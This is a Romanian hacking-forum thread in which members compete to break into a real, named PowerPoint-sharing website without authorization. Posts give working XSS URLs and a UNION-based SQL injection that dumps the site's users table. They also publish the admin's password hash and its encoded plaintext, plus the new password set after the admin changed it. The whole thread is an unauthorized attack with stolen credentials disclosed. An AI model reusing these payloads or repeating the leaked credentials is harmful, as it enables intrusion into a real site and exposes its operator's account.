Sega Posted February 18, 2012 Report Posted February 18, 2012 (edited) Target: www.nicepps.roCauta un xss in site-ul asta si posteaza o poza (ascunde detaliile).Exemplu: http://postimage.org/image/pn4ob6rzb/P.S: Nu e greu, just 4 fun Pana acum au gasit XSS-ul:JimmyKodRSSak4d3ablackboy[1337] Edited February 18, 2012 by Sega Quote
Sega Posted February 18, 2012 Author Report Posted February 18, 2012 (edited) Mai are ceva pe langa xss.Acum am vazut ca mai are si SQLI @ak4d3a ia vezi daca gasesti vreun XSS intr-o pagina .HTML Edited February 18, 2012 by Sega Quote
blackboy-1337- Posted February 18, 2012 Report Posted February 18, 2012 http://imageshack.us/photo/my-images/259/lenep.jpg/ Quote
SirGod Posted February 18, 2012 Report Posted February 18, 2012 Acum am vazut ca mai are si SQLI @ak4d3a ia vezi daca gasesti vreun XSS intr-o pagina .HTML Paginile alea "HTML" sunt defapt PHP-uri (URL Rewrite). In pagini HTML poti gasi doar DOM XSS, in cazul in care contin cod JavaScript vulnerabil. Quote
Sega Posted February 18, 2012 Author Report Posted February 18, 2012 (edited) XSShttp://www.nicepps.ro/cauta-pps-ppt-toate-categoriile-0-q-"><script>alert(1)</script>-m-orice-cuvant-pag-1.htmlhttp://www.nicepps.ro/index.php?action=felicitare&id=369'"><script>alert(1)</script>SQLIwww.nicepps.ro/index.php?action=details&id=2561 and 1=2 UNION SELECT 1,group_concat(user,0x2c20,password,0x2c20,email,0x3c62722f3e),3,4,5,6,7,8,9,10,11,12,13 FROM users--Admin : PassAlexB : 90ae07eadcbfc3934252980ed73885d5 (adica YWxleDc3Nw==)Login page: admin@SirGod nu e logic? Era interesant la acel xss daca il introduci in search box nu trece de filtru, daca il introduci direct in url (mai sus) trece de acel filtru.Puteti da T.C Edited February 18, 2012 by Sega Quote
Sega Posted February 18, 2012 Author Report Posted February 18, 2012 @curiosul unde vezi tu xss in poza ta? @silviu am postat deja rezolvarea Quote
Guest expl0iter Posted February 18, 2012 Report Posted February 18, 2012 Daca asta e challenge, atunci alea ale lui pyth0ne ce mai sunt? Quote
curiosul Posted February 18, 2012 Report Posted February 18, 2012 @sega am gasit xss, dar nu cred ca mai era cazul sa fac si poza, mi s-a parut mai interesant ce am postat...aHR0cDovL3d3dy5uaWNlcHBzLnJvL2NhdXRhLXBwcy1wcHQtdG9hdGUtY2F0ZWdvcmlpbGUtMC1xLSUzQ2lmcmFtZS8lMjAvb25sb2FkPWFsZXJ0JTI4L3hzcy8lMjklM0UlM0NpZnJhbWUlM0UtbS1vcmljZS1jdXZhbnQtcGFnLTEuaHRtbA== Quote
jetus Posted February 18, 2012 Report Posted February 18, 2012 Prezentari PowerPoint (pps, pptx, ppt, ppsx) - Quote
Sega Posted February 19, 2012 Author Report Posted February 19, 2012 (edited) XSShttp://www.nicepps.ro/cauta-pps-ppt-toate-categoriile-0-q-"><script>alert(1)</script>-m-orice-cuvant-pag-1.htmlhttp://www.nicepps.ro/index.php?action=felicitare&id=369'"><script>alert(1)</script>SQLIwww.nicepps.ro/index.php?action=details&id=2561 and 1=2 UNION SELECT 1,group_concat(user,0x2c20,password,0x2c20,email,0x3c62722f3e),3,4,5,6,7,8,9,10,11,12,13 FROM users--Admin : PassAlexB : 90ae07eadcbfc3934252980ed73885d5 (adica YWxleDc3Nw==)Login page: admin@SirGod nu e logic? Era interesant la acel xss daca il introduci in search box nu trece de filtru, daca il introduci direct in url (mai sus) trece de acel filtru.Puteti da T.CAm postat rezolvarea, la ce mai postati?L.E: adminul a schimbat parola, dar nu a rezolvat vulnerabilitatea noua parola: YW5hY29uZGEyNw== Edited February 19, 2012 by Sega Quote
SilviuSDS Posted February 19, 2012 Report Posted February 19, 2012 @curiosul unde vezi tu xss in poza ta? @silviu am postat deja rezolvarea Nu am fost atent, am citit doar prima postare Quote
